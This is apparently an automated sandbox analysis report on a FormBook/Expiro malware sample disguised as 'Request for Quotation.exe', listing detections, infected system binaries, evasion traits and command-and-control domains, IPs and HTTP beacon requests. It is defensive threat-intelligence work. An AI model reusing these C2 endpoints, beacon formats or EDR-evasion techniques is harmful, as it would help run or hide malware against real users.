Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quotation.exe

Overview

General Information

Sample name:Request for Quotation.exe
Analysis ID:1572510
MD5:fe6fb05450b37478070255dcf0a11654
SHA1:a6246b77f50e6abb2cde5bd9071c9e005974349b
SHA256:34d8fc929f49899ffc738a5f19e97b9d1d2d6e63b26884af6ce803d9aed050bb
Tags:exeExpirouser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Request for Quotation.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\Request for Quotation.exe" MD5: FE6FB05450B37478070255DCF0A11654)
    • svchost.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\Request for Quotation.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 6648 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 68F239C01813FB34CDEBECC73B16EDE9)
  • alg.exe (PID: 1360 cmdline: C:\Windows\System32\alg.exe MD5: 5814D242CD3F0A5096ACA78A36BA8FA8)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 3084 cmdline: C:\Windows\system32\AppVClient.exe MD5: 5DD1E83A36E68A7B8F2D74514F9AFFA1)
  • FXSSVC.exe (PID: 2520 cmdline: C:\Windows\system32\fxssvc.exe MD5: 4858CF6BC0503B39DCDAD51E994CDEF5)
  • elevation_service.exe (PID: 3084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 50E9A4F9451FF8D2C576BF053A02B0D7)
  • maintenanceservice.exe (PID: 2520 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 3F3BEE4315081168FC542419E2F2D1A6)
  • msdtc.exe (PID: 2640 cmdline: C:\Windows\System32\msdtc.exe MD5: D8FC46BD67F795631C6DAD07E33247EE)
  • PerceptionSimulationService.exe (PID: 7176 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 65E45E0DE8536F3B14E886405F9D1C56)
  • perfhost.exe (PID: 7224 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: E14C66701387555047BA9BBD23773B82)
  • Locator.exe (PID: 7252 cmdline: C:\Windows\system32\locator.exe MD5: 0EA212771D99ED9B59C38AC619AF79B7)
  • SensorDataService.exe (PID: 7272 cmdline: C:\Windows\System32\SensorDataService.exe MD5: B7946E1BA775337FEE4E6785A5E67187)
  • snmptrap.exe (PID: 7312 cmdline: C:\Windows\System32\snmptrap.exe MD5: 612475391C7276C2E25FF0A0CCAD3C66)
  • Spectrum.exe (PID: 7344 cmdline: C:\Windows\system32\spectrum.exe MD5: 7708CE35FBFD8CB3DA18C4C0207016DB)
  • ssh-agent.exe (PID: 7408 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 7765865BFBC2AA0361E0E3A618C590B8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      19.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        19.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Execution of Suspicious File Type Extension
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine|base64offset|contains: ~, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation.exe, ParentProcessId: 6584, ParentProcessName: Request for Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ProcessId: 7392, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", CommandLine|base64offset|contains: ~, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation.exe, ParentProcessId: 6584, ParentProcessName: Request for Quotation.exe, ProcessCommandLine: "C:\Users\user\Desktop\Request for Quotation.exe", ProcessId: 7392, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-10T16:40:22.228667+010020516491A Network Trojan was detected192.168.2.4532011.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-10T16:40:15.049057+010020516481A Network Trojan was detected192.168.2.4566821.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-10T16:40:07.592457+010020181411A Network Trojan was detected54.244.188.17780192.168.2.449730TCP
          2024-12-10T16:40:11.038990+010020181411A Network Trojan was detected18.141.10.10780192.168.2.449733TCP
          2024-12-10T16:40:15.089548+010020181411A Network Trojan was detected44.221.84.10580192.168.2.449735TCP
          2024-12-10T16:41:59.468543+010020181411A Network Trojan was detected47.129.31.21280192.168.2.449882TCP
          2024-12-10T16:42:01.940809+010020181411A Network Trojan was detected13.251.16.15080192.168.2.449888TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-10T16:40:07.592457+010020377711A Network Trojan was detected54.244.188.17780192.168.2.449730TCP
          2024-12-10T16:40:11.038990+010020377711A Network Trojan was detected18.141.10.10780192.168.2.449733TCP
          2024-12-10T16:40:15.089548+010020377711A Network Trojan was detected44.221.84.10580192.168.2.449735TCP
          2024-12-10T16:41:59.468543+010020377711A Network Trojan was detected47.129.31.21280192.168.2.449882TCP
          2024-12-10T16:42:01.940809+010020377711A Network Trojan was detected13.251.16.15080192.168.2.449888TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-10T16:40:14.844579+010028508511Malware Command and Control Activity Detected192.168.2.44973544.221.84.10580TCP
          2024-12-10T16:41:56.640663+010028508511Malware Command and Control Activity Detected192.168.2.44983682.112.184.19780TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: Request for Quotation.exeAvira: detected
          Antivirus detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\Spectrum.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\snmptrap.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\msiexec.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\SensorDataService.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\msdtc.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\Locator.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\SysWOW64\perfhost.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\FXSSVC.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeAvira: detection malicious, Label: W32/Infector.Gen
          Multi AV Scanner detection for submitted file
          Source: Request for Quotation.exeReversingLabs: Detection: 81%
          Yara detected FormBook
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\Spectrum.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\snmptrap.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\msiexec.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\SensorDataService.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\msdtc.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\Locator.exeJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\perfhost.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeJoe Sandbox ML: detected
          Source: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\FXSSVC.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJoe Sandbox ML: detected
          Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: Request for Quotation.exeJoe Sandbox ML: detected
          Source: Request for Quotation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Request for Quotation.exe, 00000000.00000003.1706837407.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
          Source: Binary string: msiexec.pdb source: msiexec.exe.0.dr
          Source: Binary string: SensorDataService.pdb source: SensorDataService.exe.0.dr
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
          Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
          Source: Binary string: SensorDataService.pdbGCTL source: SensorDataService.exe.0.dr
          Source: Binary string: PerfHost.pdb source: perfhost.exe.0.dr
          Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
          Source: Binary string: ssh-agent.pdb source: ssh-agent.exe.0.dr
          Source: Binary string: msiexec.pdbGCTL source: msiexec.exe.0.dr
          Source: Binary string: PresentationFontCache.pdb source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: maintenanceservice.pdb` source: maintenanceservice.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdb source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000013.00000003.1966749600.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2017801788.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.1963812454.0000000003100000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
          Source: Binary string: Spectrum.pdb source: Spectrum.exe.0.dr
          Source: Binary string: MsSense.pdbGCTL source: MsSense.exe.0.dr
          Source: Binary string: MsSense.pdb source: MsSense.exe.0.dr
          Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
          Source: Binary string: ALG.pdb source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.0.dr
          Source: Binary string: locator.pdb source: Locator.exe.0.dr
          Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: ALG.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1711267441.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
          Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Request for Quotation.exe, 00000000.00000003.1747636578.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Request for Quotation.exe, 00000000.00000003.1732378298.00000000040F0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
          Source: Binary string: locator.pdbGCTL source: Locator.exe.0.dr
          Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
          Source: Binary string: ssh-agent.pdbX source: ssh-agent.exe.0.dr
          Source: Binary string: snmptrap.pdb source: snmptrap.exe.0.dr
          Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
          Source: Binary string: snmptrap.pdbGCTL source: snmptrap.exe.0.dr
          Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr
          Source: Binary string: PerceptionSimulationService.pdbGCTL source: PerceptionSimulationService.exe.0.dr
          Source: Binary string: maintenanceservice.pdb source: maintenanceservice.exe.0.dr
          Source: Binary string: PerfHost.pdbGCTL source: perfhost.exe.0.dr

          Spreading

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
          Source: C:\Users\user\Desktop\Request for Quotation.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:53201 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:56682 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49735 -> 44.221.84.105:80
          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49836 -> 82.112.184.197:80
          Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
          Source: Joe Sandbox ViewIP Address: 18.141.10.107 18.141.10.107
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49733
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49733
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49730
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49735
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49735
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49882
          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49888
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49888
          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49882
          Source: global trafficHTTP traffic detected: POST /miswwsapbqmsir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 824
          Source: global trafficHTTP traffic detected: POST /hcwjealfbuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /njrv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 824
          Source: global trafficHTTP traffic detected: POST /kr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /iropyruplkan HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /hgpugagvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: global trafficHTTP traffic detected: POST /ytpebbldheutao HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
          Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
          Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
          Source: unknownHTTP traffic detected: POST /miswwsapbqmsir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 824
          Source: Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
          Source: Request for Quotation.exe, 00000000.00000003.1737413561.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
